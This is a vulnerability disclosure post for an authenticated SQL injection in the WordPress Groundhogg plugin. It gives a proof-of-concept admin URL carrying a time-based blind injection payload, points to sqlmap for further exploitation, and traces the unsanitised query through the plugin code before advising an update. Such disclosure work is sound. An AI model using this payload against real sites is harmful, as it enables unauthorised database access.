Wordpress Groundhogg <= 1.3.11.13 Authentificated SQL Injection
Wordpress Groundhogg plugin with a version lower than 1.3.11.13 is affected by an Authenticated SQL Injection vulnerability.
Intial submission of the vulnerability
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Exploit Title: Wordpress Groundhogg <= 1.3.11.13 Authenticated SQL Injection Vulnerability
# Date: 23-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 1.3.11.13
# Tested on: Ubuntu 18.04 / Wordpress 5.3
1. Description:
Wordpress Groundhogg plugin with a version lower than 1.3.11.13 is affected by an Authenticated SQL Injection vulnerability.
2. Proof of Concept:
Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.
Detailed analysis of the vulnerability
The function from /wp-content/plugins/groundhogg/includes/admin/tools/class-wpgh-export-bulk-job.php
from lines 38-51
is accepting arbitrary user-supplied data as follows:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
public function query($items)
{
if ( ! current_user_can( 'export_contacts' ) ){
return $items;
}
$query = new WPGH_Contact_Query();
$args = $_GET;
$contacts = $query->query( $args );
$ids = wp_list_pluck( $contacts, 'ID' );
return $ids;
}
The line containing $contacts = $query->query( $args );
allows unsanitised user input within the following function from /wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php
lines 279-284
:
1
2
3
4
5
6
public function query( $query ) {
$this->query_vars = wp_parse_args( $query );
$items = $this->get_items();
return $items;
}
Finaly the unsinitised query is perfomed on wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php
at line 430
( WPGH_Contact_Query->query_items()
):
1
2
3
$results = $wpdb->get_results( $this->request );
return $results;
How to fix
Update to the latest available version of the Groundhogg plugin.
Public appearances
- tba
Other references
- tba
This post is licensed under CC BY 4.0 by the author.